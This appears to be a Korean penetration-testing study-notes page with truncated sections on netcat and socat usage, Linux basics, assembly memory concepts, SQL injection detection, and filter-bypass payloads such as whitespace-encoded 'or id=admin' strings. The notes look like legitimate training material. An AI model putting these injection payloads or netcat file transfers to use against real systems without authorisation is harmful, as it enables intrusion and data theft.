Penetration Testing

1️⃣ Practical Tools 📜Netcat tcp , udp protocol 사용 Connecting tcp/udp port nc -nv 10.11.0.22 4444 Listening on a TCP/UDP Port nc -nlvp 4444 Transferring Files w/ Netcat nc -nlvp 4444 > incoming.exe nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe 📜Socat Connecting socat - TCP4:<remote server’s ip address>:80 Listening sudo socat TCP4-LISTEN:443 STDOUT File Transfers sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt 📜Powershell and powercat 📜Wireshark 📜Tcpdump

1️⃣ linux 필수 Command 📜Man Pages man 📜apropos apropos 📜Listing Files ls -al 📜Moving Around cd pwd 📜Creating Directories mkdir mkdir module one cd module\ one/ mkdir -p 📜Finding Files echo which locate find 📜Managing Kali Linux Services systemctl SSH Service sudo systemctl start ssh (ssh 시작) sudo ss -antlp | grep sshd (ssh 구동 확인) sudo systemctl enable ssh (부팅시 ssh 실행) HTTP service sudo systemctl start apache2 sudo ss -antlp | grep apache...

1️⃣ Assembly 기초 📜프로그램과 메모리 - 프로세스 : 메모리에 로드된 프로그램 - 프로그램은 크게 코드, 데이터로 나누어 볼 수 있음 - 프로그램에서 사용하는 코드와 데이터는 메모리에 로드되며, 코드 실행 흐름에 따라 변화하는 값들은 스택 또는 힙에 쌓이게됨 - 운영체제는 프로세스들의 독립적인 공간을 보장함 - 다른 프로세스의 영역을 함부로 접근하는 것을 막는 매커니즘이 존재 - 프로세스와 메모리 관리는 운영체제에 의해서 이루어짐 📜스택(Stack) - LIFO 구조 : Last In - First Out, 가장 처음에 들어간 데이터가 가장 나중에 옴...

1️⃣ SQL Injection 취약점 점검 📜SQL Injection 에러 유/무 확인 취약점 유/무 확인 검색란의 경우, 연결연산자 사용 a. ’ ’ 로 사용하여 정상작동 한다면 (te’ ‘st), Mysql b. ‘+’ 로 사용하여 정상작동 한다면 (te’+‘st), Mssql c. ‘||’ 로 사용하여 정상작동 한다면 (te’||‘st), Oracle 조건 구문 완성 📜방법론 1) 검색기능에 대한 취약점 점검 a. select * from board where title like ‘% ‘||(case when 1=1 then ’test’ else ‘aaaa’ end)||’ %’...

1️⃣ SQL Injection 우회기법 📜SQL Injection 공격시 공백 문자 필터링시 우회 방법 Tab : %09 - no=1%09or%09id=‘admin’ Line Feed (\n): %0a - no=1%0aor%0aid=‘admin’ Carrage Return(\r) : %0d - no=1%0dor%0did=‘admin’ 주석 : /**/ - no=1//or//id=‘admin’ 괄호 : () - no=(1)or(id=‘admin’) 더하기 : + - no=1+or+id=‘admin’